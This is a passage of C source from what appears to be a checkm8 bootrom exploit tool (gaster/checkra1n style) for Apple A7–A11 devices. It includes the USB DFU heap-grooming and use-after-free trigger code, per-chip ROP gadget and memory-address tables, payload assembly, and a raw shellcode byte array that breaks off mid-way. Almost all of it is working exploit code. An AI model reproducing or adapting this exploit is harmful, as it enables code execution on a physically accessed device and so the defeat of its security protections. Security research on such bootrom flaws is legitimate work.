LOG(LOG_VERBOSE, "Preparing payload for device with CPID 0x%x...", deviceConfig->cpid); 154 | if (deviceConfig->cpid >= 0x8001 && deviceConfig->cpid <= 0x8015 && deviceConfig->cpid != 0x8003) { 155 | reg = 0x1000006A5; 156 | memcpy(data + payloadConfig->ttbr0VROMOffset, ®, sizeof(reg)); 157 | reg = 0x60000100000625; 158 | memcpy(data + payloadConfig->ttbr0VROMOffset + sizeof(reg), ®, sizeof(reg)); 159 | reg = 0x60000180000625; 160 | memcpy(data + payloadConfig->ttbr0SRAMOffset, ®, sizeof(reg)); 161 | reg = 0x1800006A5; 162 | memcpy(data + payloadConfig->ttbr0SRAMOffset + sizeof(reg), ®, sizeof(reg)); 163 | generate_usb_rop_callbacks(data + offsetof(dfu_callback_t, callback), payloadConfig->insecureMemoryBase, callbacks, sizeof(callbacks) / sizeof(callbacks[0]), payloadConfig); 164 | data_sz = payloadConfig->ttbr0SRAMOffset + 2 * sizeof(reg); 165 | } else { 166 | data_sz = 0; 167 | } 168 | 169 | memcpy(data + data_sz, payload, payload_sz); 170 | data_sz += payload_sz; 171 | 172 | char *pwndString = " PWND:[checkm8]"; 173 | 174 | if (deviceConfig->cpid == 0x8000 || deviceConfig->cpid == 0x8003) { 175 | memset(A9.pwnd, 0, sizeof(A9.pwnd)); 176 | memcpy(A9.pwnd, pwndString, strlen(pwndString)); 177 | A9.payload_dest = payloadConfig->bootTrampolineEnd - request_handler_payload_size - sizeof(handle_checkm8_request); 178 | A9.dfu_handle_bus_reset = payloadConfig->dfu_handle_bus_reset_address; 179 | A9.dfu_handle_request = payloadConfig->dfu_handle_request_address; 180 | A9.payload_off = payload_sz + sizeof(A9); 181 | A9.payload_sz = request_handler_payload_size + sizeof(handle_checkm8_request); 182 | A9.memcpy_addr = payloadConfig->memcpyAddress; 183 | A9.gUSBSerialNumber = payloadConfig->gUSBSerialNumber; 184 | A9.usb_create_string_descriptor = payloadConfig->usb_create_string_descriptor; 185 | A9.usb_serial_number_string_descriptor = payloadConfig->usb_serial_number_string_descriptor; 186 | A9.ttbr0_vrom_addr = payloadConfig->ttbr0Address + payloadConfig->ttbr0VROMOffset; 187 | A9.patch_addr = payloadConfig->patchAddress; 188 | memcpy(data + data_sz, &A9, sizeof(A9)); 189 | data_sz += sizeof(A9); 190 | memcpy(data + data_sz, request_handler_payload, request_handler_payload_size); 191 | data_sz += request_handler_payload_size; 192 | handle_checkm8_request.handle_interface_request = payloadConfig->handle_interface_request; 193 | handle_checkm8_request.insecure_memory_base = payloadConfig->insecureMemoryBase; 194 | handle_checkm8_request.exec_magic = EXEC_MAGIC; 195 | handle_checkm8_request.done_magic = DONE_MAGIC; 196 | handle_checkm8_request.memc_magic = MEMC_MAGIC; 197 | handle_checkm8_request.memcpy_addr = payloadConfig->memcpyAddress; 198 | handle_checkm8_request.usb_core_do_transfer = payloadConfig->usb_core_do_transfer; 199 | memcpy(data + data_sz, &handle_checkm8_request, sizeof(handle_checkm8_request)); 200 | data_sz += sizeof(handle_checkm8_request); 201 | } else { 202 | memset(notA9.pwnd, 0, sizeof(notA9.pwnd)); 203 | memcpy(notA9.pwnd, pwndString, strlen(pwndString)); 204 | notA9.payload_dest = payloadConfig->bootTrampolineEnd - request_handler_payload_size - sizeof(handle_checkm8_request); 205 | notA9.dfu_handle_bus_reset = payloadConfig->dfu_handle_bus_reset_address; 206 | notA9.dfu_handle_request = payloadConfig->dfu_handle_request_address; 207 | notA9.payload_off = payload_sz + sizeof(notA9); 208 | notA9.payload_sz = request_handler_payload_size + sizeof(handle_checkm8_request); 209 | notA9.memcpy_addr = payloadConfig->memcpyAddress; 210 | notA9.gUSBSerialNumber = payloadConfig->gUSBSerialNumber; 211 | notA9.usb_create_string_descriptor = payloadConfig->usb_create_string_descriptor; 212 | notA9.usb_serial_number_string_descriptor = payloadConfig->usb_serial_number_string_descriptor; 213 | notA9.patch_addr = payloadConfig->patchAddress; 214 | if(deviceConfig->cpid == 0x8001 || deviceConfig->cpid == 0x8010 || deviceConfig->cpid == 0x8011 || deviceConfig->cpid == 0x8012 || deviceConfig->cpid == 0x8015) { 215 | notA9.patch_addr += ARM_16K_TT_L2_SIZE; 216 | } 217 | memcpy(data + data_sz, ¬A9, sizeof(notA9)); 218 | data_sz += sizeof(notA9); 219 | memcpy(data + data_sz, request_handler_payload, request_handler_payload_size); 220 | data_sz += request_handler_payload_size; 221 | handle_checkm8_request.handle_interface_request = payloadConfig->handle_interface_request; 222 | handle_checkm8_request.insecure_memory_base = payloadConfig->insecureMemoryBase; 223 | handle_checkm8_request.exec_magic = EXEC_MAGIC; 224 | handle_checkm8_request.done_magic = DONE_MAGIC; 225 | handle_checkm8_request.memc_magic = MEMC_MAGIC; 226 | handle_checkm8_request.memcpy_addr = payloadConfig->memcpyAddress; 227 | handle_checkm8_request.usb_core_do_transfer = payloadConfig->usb_core_do_transfer; 228 | memcpy(data + data_sz, &handle_checkm8_request, sizeof(handle_checkm8_request)); 229 | data_sz += sizeof(handle_checkm8_request); 230 | } 231 | 232 | *payloadSize = data_sz; 233 | return (uint8_t *)data; 234 | } 235 | return NULL; 236 | } 237 | 238 | return NULL; 239 | } 240 | 241 | uint8_t *create_pongo_overwrite_for_device(struct PayloadConfiguration *payloadConfig, size_t *overwriteSize) { 242 | LOG(LOG_VERBOSE, "Preparing overwrite for YoloDFU mode."); 243 | uint64_t *overwrite = malloc(0x30); 244 | overwrite[5] = payloadConfig->insecureMemoryBase; 245 | *overwriteSize = 0x30; 246 | return (uint8_t *)overwrite; 247 | } 248 | 249 | #include 250 | #include 251 | #include 252 | #include 253 | #include 254 | #include 255 | #include 256 | #include 257 | uint8_t *create_pongo_payload_for_device(struct DeviceConfiguration *deviceConfig, size_t *payloadSize) { 258 | LOG(LOG_VERBOSE, "Preparing YoloDFU payload for CPID 0x%x.", deviceConfig->cpid); 259 | switch (deviceConfig->cpid) { 260 | case 0x8015: 261 | *payloadSize = yolo_t8015_bin_len; 262 | return (uint8_t *)yolo_t8015_bin; 263 | case 0x8011: 264 | *payloadSize = yolo_t8011_bin_len; 265 | return (uint8_t *)yolo_t8011_bin; 266 | case 0x8010: 267 | *payloadSize = yolo_t8010_bin_len; 268 | return (uint8_t *)yolo_t8010_bin; 269 | case 0x8003: 270 | *payloadSize = yolo_s8003_bin_len; 271 | return (uint8_t *)yolo_s8003_bin; 272 | case 0x8001: 273 | *payloadSize = yolo_s8001_bin_len; 274 | return (uint8_t *)yolo_s8001_bin; 275 | case 0x8000: 276 | *payloadSize = yolo_s8000_bin_len; 277 | return (uint8_t *)yolo_s8000_bin; 278 | case 0x7001: 279 | *payloadSize = yolo_t7001_bin_len; 280 | return (uint8_t *)yolo_t7001_bin; 281 | case 0x7000: 282 | *payloadSize = yolo_t7000_bin_len; 283 | return (uint8_t *)yolo_t7000_bin; 284 | default: 285 | LOG(LOG_ERROR, "Failed to prepare payload for device with CPID 0x%x.", deviceConfig->cpid); 286 | return NULL; 287 | } 288 | } -------------------------------------------------------------------------------- /src/exploit/checkm8.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // Start a new DFU transfer or continue an existing one 4 | // Once finished, DFU will be ready for checkm8 5 | bool checkm8_reset(usb_handle_t *handle) { 6 | transfer_ret_t transferRet; 7 | 8 | // Send zero-length packet to end existing transfer 9 | bool ret = send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_FILE_SUFFIX_LENGTH, &transferRet); 10 | if (!ret) { goto fail; } 11 | if (transferRet.ret != USB_TRANSFER_OK || transferRet.sz != DFU_FILE_SUFFIX_LENGTH) { return false; } 12 | 13 | // Requests image validation like we are about to boot it 14 | ret = dfu_device_set_await_reset(handle); 15 | if (!ret) { goto fail; } 16 | 17 | // Start a new DFU transfer 18 | ret = send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SIZE, &transferRet); 19 | if (!ret) { goto fail; } 20 | if (transferRet.ret != USB_TRANSFER_OK || transferRet.sz != EP0_MAX_PACKET_SIZE) { goto fail; } 21 | 22 | // Ready for checkm8 23 | return true; 24 | 25 | fail: 26 | // DFU abort on failure 27 | send_usb_control_request_no_data(handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL); 28 | LOG(LOG_ERROR, "Failed to reset device."); 29 | return false; 30 | } 31 | 32 | bool checkm8_stall(usb_handle_t *handle) { 33 | int usbAbortTimeout = 10; 34 | transfer_ret_t transferRet; 35 | while (send_usb_control_request_async_no_data(handle, 0x80, DFU_ABORT, 0x304, 0xA, 0xC0, usbAbortTimeout, &transferRet)) { 36 | if (transferRet.sz < 0xC0 37 | && send_usb_control_request_async_no_data(handle, 0x80, DFU_ABORT, 0x304, 0xA, 0x40, 1, &transferRet) 38 | && transferRet.sz == 0) { 39 | LOG(LOG_VERBOSE, "Stalled device."); 40 | return true; 41 | } 42 | usbAbortTimeout = (usbAbortTimeout + 1) % 10; 43 | } 44 | LOG(LOG_ERROR, "Failed to stall device!"); 45 | return false; 46 | } 47 | 48 | bool checkm8_usb_request_stall(usb_handle_t *handle) { 49 | return send_usb_control_request_no_data(handle, 0x2, DFU_GETSTATUS, 0, 0x80, 0, NULL); 50 | } 51 | 52 | bool checkm8_send_leaking_zlp(usb_handle_t *handle) { 53 | return send_usb_control_request_no_data(handle, 0x80, DFU_ABORT, 0x304, 0x40A, 0x40, NULL); 54 | } 55 | 56 | bool checkm8_send_normal_zlp(usb_handle_t *handle) { 57 | return send_usb_control_request_no_data(handle, 0x80, DFU_ABORT, 0x304, 0x40A, 0xC1, NULL); 58 | } 59 | 60 | bool checkm8_heap_feng_shui(usb_handle_t *handle, struct DeviceConfiguration *config) { 61 | if (config->largeLeak == 0) { 62 | if (config->cpid >= 0x7000 && config->cpid <= 0x8003 && config->cpid != 0x8001) { 63 | while (!checkm8_usb_request_stall(handle) || !checkm8_send_leaking_zlp(handle) || !checkm8_send_normal_zlp(handle)) { } 64 | } else { 65 | // Stall endpoint (and leak a packet) 66 | if (!checkm8_stall(handle)) { return false; } 67 | 68 | // Send enough packets to fill the hole 69 | LOG(LOG_VERBOSE, "Sending %d normal ZLPs.", config->hole); 70 | for (int i = 0; i < config->hole; i++) { 71 | if (!checkm8_send_normal_zlp(handle)) { return false; } 72 | } 73 | 74 | // Add another leaking packet the end of the hole 75 | if (!checkm8_send_leaking_zlp(handle)) { return false; } 76 | 77 | // Make sure the conditions are correct 78 | // So that the packets are actually leaked 79 | // (latest wLength > queued packet wLength) 80 | if (!checkm8_send_normal_zlp(handle)) { return false; } 81 | } 82 | } else { // Unused as we don't have A7/A6 support yet 83 | 84 | // All packets are leaked - fill out the heap 85 | // such that there is a hole at the end for the IO buffer 86 | for (int i = 0; i < config->largeLeak; i++) { 87 | checkm8_usb_request_stall(handle); 88 | } 89 | 90 | // Abort DFU and leak the packets 91 | send_usb_control_request_no_data(handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL); 92 | } 93 | return true; 94 | } 95 | 96 | bool checkm8_trigger_UaF(usb_handle_t *handle, struct DeviceConfiguration *config) { 97 | unsigned usbAbortTimeout = USB_TIMEOUT; 98 | transfer_ret_t transferRet; 99 | 100 | // Keep asynchonously sending packets until we get a stall (which is actually the data not being sent) 101 | while (send_usb_control_request_async_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_MAX_TRANSFER_SIZE, usbAbortTimeout, &transferRet)) { 102 | 103 | // Overwrite padding to ensure we overwrite the correct data 104 | if (transferRet.sz < config->overwritePadding 105 | && send_usb_control_request_no_data(handle, 0, 0, 0, 0, config->overwritePadding - transferRet.sz, &transferRet) 106 | && transferRet.ret == USB_TRANSFER_STALL) { 107 | 108 | // DFU abort and trigger the UaF 109 | send_usb_control_request_no_data(handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL); 110 | return true; 111 | } 112 | 113 | // If we don't get a stall, something went wrong 114 | if (!send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SIZE, NULL)) { 115 | break; 116 | } 117 | 118 | usbAbortTimeout = (usbAbortTimeout + 1) % 10; 119 | } 120 | return false; 121 | } 122 | 123 | bool checkm8_send_overwrite_and_payload(usb_handle_t *handle, struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, bool bootingPongoOS) { 124 | size_t overwriteSize = 0; 125 | size_t payloadSize = 0; 126 | 127 | uint8_t *overwrite = bootingPongoOS ? create_pongo_overwrite_for_device(payloadConfig, &overwriteSize) : create_gaster_overwrite_for_device(deviceConfig, payloadConfig, &overwriteSize); 128 | 129 | uint8_t *payload = bootingPongoOS ? create_pongo_payload_for_device(deviceConfig, &payloadSize) : create_gaster_payload_for_device(deviceConfig, payloadConfig, &payloadSize); 130 | 131 | if (!overwrite || overwriteSize == 0) { 132 | LOG(LOG_ERROR, "Failed to generate overwrite!"); 133 | goto cleanup; 134 | } 135 | 136 | if (!payload || payloadSize == 0) { 137 | LOG(LOG_ERROR, "Failed to generate payload!"); 138 | goto cleanup; 139 | } 140 | 141 | transfer_ret_t transferRet; 142 | 143 | // Why is this needed? 144 | if (deviceConfig->cpid >= 0x8001 && deviceConfig->cpid <= 0x8015 && deviceConfig->cpid != 0x8003) { 145 | if (!checkm8_usb_request_stall(handle)) { goto cleanup; } 146 | if (!checkm8_send_leaking_zlp(handle)) { goto cleanup; } 147 | } 148 | send_usb_control_request_no_data(handle, 2, DFU_GETSTATUS, 0, 0x80, 0, NULL); 149 | send_usb_control_request_no_data(handle, 2, DFU_GETSTATUS, 0, 0x80, 0, NULL); 150 | 151 | // Send overwrite and make sure the endpoint is still stalled 152 | if (send_usb_control_request(handle, 0, 0, 0, 0, overwrite, overwriteSize, &transferRet) 153 | && transferRet.ret == USB_TRANSFER_STALL) { 154 | 155 | // Reset the global state so we can send our payload? 156 | if (!bootingPongoOS && !send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SIZE, NULL)) { goto cleanup; } 157 | bool ret = true; 158 | size_t packetSize = 0; 159 | 160 | for (int i = 0; ret && i < payloadSize; i += packetSize) { 161 | packetSize = MIN(payloadSize - i, DFU_MAX_TRANSFER_SIZE); 162 | LOG(LOG_VERBOSE, "Sending payload chunk of size 0x%x.", packetSize); 163 | // Send payload chunk 164 | ret = send_usb_control_request(handle, 0x21, DFU_DNLOAD, 0, 0, &payload[i], packetSize, NULL); 165 | } 166 | 167 | if (ret) { 168 | // T8011 is fragile... 169 | if (deviceConfig->cpid != 0x8011) { 170 | send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_FILE_SUFFIX_LENGTH, NULL); 171 | send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, 0, NULL); 172 | } 173 | } else { 174 | LOG(LOG_ERROR, "Failed to send payload!"); 175 | } 176 | 177 | // This is the trigger for execution 178 | ret = send_usb_control_request_no_data(handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL); 179 | LOG(LOG_SUCCESS, "Checkmate!"); 180 | 181 | if (overwrite != NULL) { free(overwrite); } 182 | if (bootingPongoOS) return true; 183 | if (payload != NULL) { free(payload); } 184 | return true; 185 | } else { 186 | LOG(LOG_ERROR, "Failed to send overwrite!"); 187 | } 188 | 189 | cleanup: 190 | if (bootingPongoOS) return false; 191 | if (overwrite != NULL) { free(overwrite); } 192 | if (payload != NULL) { free(payload); } 193 | return false; 194 | } 195 | 196 | bool checkm8_find_device_configuration_for_cpid(int cpid, struct DeviceConfiguration *config) { 197 | bool foundMatchingConfiguration = true; 198 | switch (cpid) { 199 | case 0x8015: 200 | case 0x8012: 201 | case 0x8011: 202 | config->cpid = cpid; 203 | config->largeLeak = 0; 204 | config->overwritePadding = 0x540; 205 | config->hole = 6; 206 | break; 207 | case 0x8010: 208 | config->cpid = cpid; 209 | config->largeLeak = 0; 210 | config->overwritePadding = 0x5C0; 211 | config->hole = 5; 212 | break; 213 | case 0x8001: 214 | config->cpid = cpid; 215 | config->largeLeak = 0; 216 | config->overwritePadding = 0x5C0; 217 | config->hole = 6; 218 | break; 219 | case 0x8003: 220 | case 0x8000: 221 | case 0x7001: 222 | case 0x7000: 223 | config->cpid = cpid; 224 | config->largeLeak = 0; 225 | config->overwritePadding = 0x500; 226 | config->hole = 0; 227 | break; 228 | default: 229 | LOG(LOG_ERROR, "CPID 0x%x is not supported!", cpid); 230 | if (cpid > 0x8015) { 231 | LOG(LOG_ERROR, "arm64e devices (A12 and newer) will never be supported."); 232 | } 233 | 234 | foundMatchingConfiguration = false; 235 | break; 236 | } 237 | return foundMatchingConfiguration; 238 | } 239 | 240 | bool checkm8_find_payload_configuration_for_cpid(int cpid, struct PayloadConfiguration *config) { 241 | bool foundMatchingConfiguration = true; 242 | switch (cpid) { 243 | case 0x8015: 244 | config->tlbi = 0x1000004AC; 245 | config->nopGadget = 0x10000A9C4; 246 | config->retGadget = 0x100000148; 247 | config->patchAddress = 0x10000624C; 248 | config->ttbr0Address = 0x18000C000; 249 | config->functionGadget = 0x10000A9AC; 250 | config->ttbr0Write = 0x10000045C; 251 | config->memcpyAddress = 0x10000E9D0; 252 | config->aesCryptoCommand = 0x100009E9C; 253 | config->bootTrampolineEnd = 0x18001C000; 254 | config->ttbr0VROMOffset = 0x400; 255 | config->ttbr0SRAMOffset = 0x600; 256 | config->gUSBSerialNumber = 0x180003A78; 257 | config->dfu_handle_request_address = 0x180008638; 258 | config->usb_core_do_transfer = 0x10000B9A8; 259 | config->dfu_handle_bus_reset_address = 0x180008668; 260 | config->insecureMemoryBase = 0x18001C000; 261 | config->handle_interface_request = 0x10000BCCC; 262 | config->usb_create_string_descriptor = 0x10000AE80; 263 | config->usb_serial_number_string_descriptor = 0x1800008FA; 264 | break; 265 | case 0x8012: 266 | config->tlbi = 0x100000494; 267 | config->nopGadget = 0x100008DB8; 268 | config->retGadget = 0x10000012C; 269 | config->patchAddress = 0x100004854; 270 | config->ttbr0Address = 0x18000C000; 271 | config->functionGadget = 0x100008DA0; 272 | config->ttbr0Write = 0x100000444; 273 | config->memcpyAddress = 0x10000EA30; 274 | config->aesCryptoCommand = 0x1000082AC; 275 | config->bootTrampolineEnd = 0x18001C000; 276 | config->ttbr0VROMOffset = 0x400; 277 | config->ttbr0SRAMOffset = 0x600; 278 | config->gUSBSerialNumber = 0x180003AF8; 279 | config->dfu_handle_request_address = 0x180008B08; 280 | config->usb_core_do_transfer = 0x10000BD20; 281 | config->dfu_handle_bus_reset_address = 0x180008B38; 282 | config->insecureMemoryBase = 0x18001C000; 283 | config->handle_interface_request = 0x10000BFFC; 284 | config->usb_create_string_descriptor = 0x10000B1CC; 285 | config->usb_serial_number_string_descriptor = 0x18000082A; 286 | break; 287 | case 0x8011: 288 | config->tlbi = 0x100000444; 289 | config->nopGadget = 0x10000CD0C; 290 | config->retGadget = 0x100000148; 291 | config->patchAddress = 0x100007630; 292 | config->ttbr0Address = 0x1800A0000; 293 | config->functionGadget = 0x10000CCEC; 294 | config->ttbr0Write = 0x1000003F4; 295 | config->memcpyAddress = 0x100010950; 296 | config->aesCryptoCommand = 0x10000C994; 297 | config->bootTrampolineEnd = 0x1800B0000; 298 | config->ttbr0VROMOffset = 0x400; 299 | config->ttbr0SRAMOffset = 0x600; 300 | config->gUSBSerialNumber = 0x180083D28; 301 | config->dfu_handle_request_address = 0x180088A58; 302 | config->usb_core_do_transfer = 0x10000DD64; 303 | config->dfu_handle_bus_reset_address = 0x180088A88; 304 | config->insecureMemoryBase = 0x1800B0000; 305 | config->handle_interface_request = 0x10000E08C; 306 | config->usb_create_string_descriptor = 0x10000D234; 307 | config->usb_serial_number_string_descriptor = 0x18008062A; 308 | break; 309 | case 0x8010: 310 | config->tlbi = 0x100000434; 311 | config->nopGadget = 0x10000CC6C; 312 | config->retGadget = 0x10000015C; 313 | config->patchAddress = 0x1000074AC; 314 | config->ttbr0Address = 0x1800A0000; 315 | config->functionGadget = 0x10000CC4C; 316 | config->ttbr0Write = 0x1000003E4; 317 | config->memcpyAddress = 0x100010730; 318 | config->aesCryptoCommand = 0x10000C8F4; 319 | config->bootTrampolineEnd = 0x1800B0000; 320 | config->ttbr0VROMOffset = 0x400; 321 | config->ttbr0SRAMOffset = 0x600; 322 | config->gUSBSerialNumber = 0x180083CF8; 323 | config->dfu_handle_request_address = 0x180088B48; 324 | config->usb_core_do_transfer = 0x10000DC98; 325 | config->dfu_handle_bus_reset_address = 0x180088B78; 326 | config->insecureMemoryBase = 0x1800B0000; 327 | config->handle_interface_request = 0x10000DFB8; 328 | config->usb_create_string_descriptor = 0x10000D150; 329 | config->usb_serial_number_string_descriptor = 0x1800805DA; 330 | break; 331 | case 0x8001: 332 | config->tlbi = 0x100000404; 333 | config->nopGadget = 0x10000CD60; 334 | config->retGadget = 0x100000118; 335 | config->patchAddress = 0x100007668; 336 | config->ttbr0Address = 0x180050000; 337 | config->functionGadget = 0x10000CD40; 338 | config->ttbr0Write = 0x1000003B4; 339 | config->memcpyAddress = 0x1000106F0; 340 | config->aesCryptoCommand = 0x10000C9D4; 341 | config->bootTrampolineEnd = 0x180044000; 342 | config->ttbr0VROMOffset = 0x400; 343 | config->ttbr0SRAMOffset = 0x600; 344 | config->gUSBSerialNumber = 0x180047578; 345 | config->dfu_handle_request_address = 0x18004C378; 346 | config->usb_core_do_transfer = 0x10000DDA4; 347 | config->dfu_handle_bus_reset_address = 0x18004C3A8; 348 | config->insecureMemoryBase = 0x180000000; 349 | config->handle_interface_request = 0x10000E0B4; 350 | config->usb_create_string_descriptor = 0x10000D280; 351 | config->usb_serial_number_string_descriptor = 0x18004486A; 352 | break; 353 | case 0x8003: 354 | case 0x8000: 355 | config->patchAddress = 0x10000812C; 356 | config->ttbr0Address = 0x1800C8000; 357 | config->memcpyAddress = 0x100011030; 358 | config->aesCryptoCommand = 0x10000DAA0; 359 | config->bootTrampolineEnd = 0x1800E1000; 360 | config->ttbr0VROMOffset = 0x400; 361 | config->ttbr0SRAMOffset = 0x600; 362 | config->gUSBSerialNumber = 0x180087958; 363 | config->dfu_handle_request_address = 0x1800878F8; 364 | config->usb_core_do_transfer = 0x10000EE78; 365 | config->dfu_handle_bus_reset_address = 0x180087928; 366 | config->insecureMemoryBase = 0x180380000; 367 | config->handle_interface_request = 0x10000F1B0; 368 | config->usb_create_string_descriptor = 0x10000E354; 369 | config->usb_serial_number_string_descriptor = 0x1800807DA; 370 | break; 371 | case 0x7001: 372 | config->patchAddress = 0x10000AD04; 373 | config->memcpyAddress = 0x100013F10; 374 | config->aesCryptoCommand = 0x100010A90; 375 | config->bootTrampolineEnd = 0x1800E1000; 376 | config->gUSBSerialNumber = 0x180088E48; 377 | config->dfu_handle_request_address = 0x180088DF8; 378 | config->usb_core_do_transfer = 0x100011BB4; 379 | config->dfu_handle_bus_reset_address = 0x180088E18; 380 | config->insecureMemoryBase = 0x180380000; 381 | config->handle_interface_request = 0x100011EE4; 382 | config->usb_create_string_descriptor = 0x100011074; 383 | config->usb_serial_number_string_descriptor = 0x180080C2A; 384 | break; 385 | case 0x7000: 386 | config->patchAddress = 0x100007E98; 387 | config->memcpyAddress = 0x100010E70; 388 | config->aesCryptoCommand = 0x10000DA90; 389 | config->bootTrampolineEnd = 0x1800E1000; 390 | config->gUSBSerialNumber = 0x1800888C8; 391 | config->dfu_handle_request_address = 0x180088878; 392 | config->usb_core_do_transfer = 0x10000EBB4; 393 | config->dfu_handle_bus_reset_address = 0x180088898; 394 | config->insecureMemoryBase = 0x180380000; 395 | config->handle_interface_request = 0x10000EEE4; 396 | config->usb_create_string_descriptor = 0x10000E074; 397 | config->usb_serial_number_string_descriptor = 0x18008062A; 398 | break; 399 | default: 400 | LOG(LOG_ERROR, "CPID 0x%x is not supported!", cpid); 401 | foundMatchingConfiguration = false; 402 | } 403 | return foundMatchingConfiguration; 404 | } -------------------------------------------------------------------------------- /include/exploit/checkra1n/yolo_s8000.h: -------------------------------------------------------------------------------- 1 | unsigned char yolo_s8000_bin[] = { 2 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x00, 0x00, 0x00, 0x00, 3 | 0x00, 0x00, 0x00, 0xf0, 0x0c, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x38, 0x80, 4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0xde, 0x00, 0x00, 5 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x00, 0x00, 0x00, 0x00, 0x0c, 0xde, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 8 | 0x40, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0x0c, 0xde, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 11 | 0x00, 0x00, 0x00, 0x00, 0x58, 0x2f, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 12 | 0xc0, 0x1b, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 13 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 14 | 0xc0, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x2c, 0x04, 0x00, 0x00, 15 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 17 | 0x00, 0x00, 0x00, 0x00, 0x08, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 18 | 0x00, 0x00, 0x00, 0x10, 0x01, 0x53, 0x00, 0x10, 0x7e, 0x01, 0x00, 0x10, 19 | 0x9f, 0x3f, 0x03, 0xd5, 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 20 | 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 21 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 22 | 0xc0, 0x03, 0x5f, 0xd6, 0xe0, 0x07, 0x61, 0xb2, 0x21, 0x00, 0xc0, 0xd2, 23 | 0x42, 0x00, 0xa0, 0x52, 0x03, 0x01, 0x00, 0x94, 0xe0, 0x07, 0x61, 0xb2, 24 | 0x80, 0xc3, 0x94, 0xf2, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x78, 0x80, 0x72, 25 | 0x01, 0x00, 0x00, 0xb9, 0xe0, 0x07, 0x61, 0xb2, 0x07, 0x24, 0x40, 0x91, 26 | 0x01, 0x80, 0xb2, 0x52, 0x01, 0x20, 0x80, 0x72, 0xe1, 0x00, 0x00, 0xb9, 27 | 0xe1, 0x03, 0x84, 0x52, 0x61, 0xa0, 0xba, 0x72, 0xe1, 0x38, 0x00, 0xb9, 28 | 0xe1, 0x48, 0x00, 0xb9, 0x01, 0x80, 0x40, 0x91, 0xe3, 0xff, 0xff, 0x97, 29 | 0x00, 0x20, 0x3e, 0xd5, 0x41, 0x20, 0x3e, 0xd5, 0x21, 0x14, 0x00, 0x12, 30 | 0x3f, 0x70, 0x00, 0x71, 0x62, 0x00, 0x00, 0x54, 0x00, 0x00, 0x40, 0xf9, 31 | 0x00, 0x8c, 0x74, 0x92, 0xa1, 0xd0, 0x80, 0xd2, 0x21, 0x04, 0x61, 0xb2, 32 | 0x01, 0x00, 0x02, 0xf9, 0x9f, 0x3f, 0x03, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 33 | 0xdf, 0x3f, 0x03, 0xd5, 0xe7, 0x07, 0x61, 0xb2, 0xe7, 0x80, 0x43, 0x91, 34 | 0xe0, 0x00, 0x10, 0x91, 0x61, 0x01, 0x00, 0x10, 0x82, 0x2e, 0x81, 0xd2, 35 | 0xe0, 0x00, 0x00, 0x94, 0xe0, 0x00, 0x10, 0x91, 0x01, 0xd0, 0x25, 0x91, 36 | 0xcd, 0xff, 0xff, 0x97, 0x28, 0x00, 0xc0, 0xd2, 0x88, 0xbd, 0x80, 0xf2, 37 | 0x00, 0x00, 0x80, 0x52, 0x13, 0x00, 0x80, 0x52, 0x00, 0x01, 0x1f, 0xd6, 38 | 0xf9, 0x03, 0x00, 0xaa, 0xf8, 0x03, 0x01, 0xaa, 0xf7, 0x03, 0x1e, 0xaa, 39 | 0xf6, 0x03, 0x1d, 0xaa, 0x87, 0x01, 0x00, 0x94, 0x20, 0x03, 0x42, 0xb9, 40 | 0x81, 0x89, 0x89, 0x52, 0x41, 0x08, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 41 | 0xa0, 0x01, 0x00, 0x54, 0x21, 0xcd, 0x89, 0x52, 0xe1, 0xed, 0xad, 0x72, 42 | 0x21, 0x03, 0x02, 0xb9, 0x20, 0x0b, 0x42, 0xb9, 0xe1, 0xac, 0x8c, 0x52, 43 | 0x21, 0x06, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 44 | 0xe0, 0x03, 0x19, 0xaa, 0xc3, 